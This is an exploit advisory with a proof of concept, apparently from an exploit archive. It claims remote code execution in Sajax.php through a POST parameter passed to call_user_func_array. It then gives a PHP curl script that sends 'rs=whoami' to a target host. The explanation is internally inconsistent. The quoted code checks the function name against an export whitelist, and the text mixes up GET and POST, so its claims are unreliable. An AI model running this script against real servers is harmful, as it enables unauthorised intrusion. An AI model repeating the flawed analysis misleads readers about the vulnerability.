# --------------------------------------- #
# This PoC was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
# --------------------------------------- #
# 1) Bug
# 2) PoC
# --------------------------------------- #
# 2) Bug :
# An attacker might execute arbitrary PHP code with this vulnerability.
# User tainted data is embedded into a function that compiles
# PHP code on the run and #executes it thus allowing an attacker to inject
own PHP code that will be
# executed. This vulnerability can lead to full server compromise.
# Look To The File Named (Sajax.php) In Dir (admin/commonlib/lib) On Line
(63)
# 63. $func_name = $_POST["rs"];
# if (! empty($_POST["rsargs"]))
# $args = $_POST["rsargs"];
# else
# $args = array();
# }
#
# if (! in_array($func_name, $sajax_export_list))
# echo "-:$func_name not callable";
# else {
# echo "+:";
# 74. $result = call_user_func_array($func_name, $args);
# echo $result;
# }
# exit;
# }
# So We Have Variable Func Name With Post rs :)
# In Above Of Code We Have $_GET['rs']; So This Is An Attacker Wan't It.
# Look To Line (74).
# Call_User_Func_Array($func_name, $args);
# Attacker Can Inject In Get Paramater Or POST PHP Code.
# --------------------------------------- #
# 3) PoC :
# <?php
# $target = $argv[1];
# $ch = curl_init();
# curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
# curl_setopt($ch, CURLOPT_URL, "http://$target/Sajax.php");
# curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01;
Windows NT 5.0)");
# curl_setopt($ch, CURLOPT_POST, 1);
# curl_setopt($ch, CURLOPT_POSTFIELDS, "rs=whoami");
# curl_setopt($ch, CURLOPT_TIMEOUT, 3);
# curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
# curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
# curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
# $buf = curl_exec ($ch);
# curl_close($ch);
# unset($ch);
# echo $buf;
# ?>
暂无评论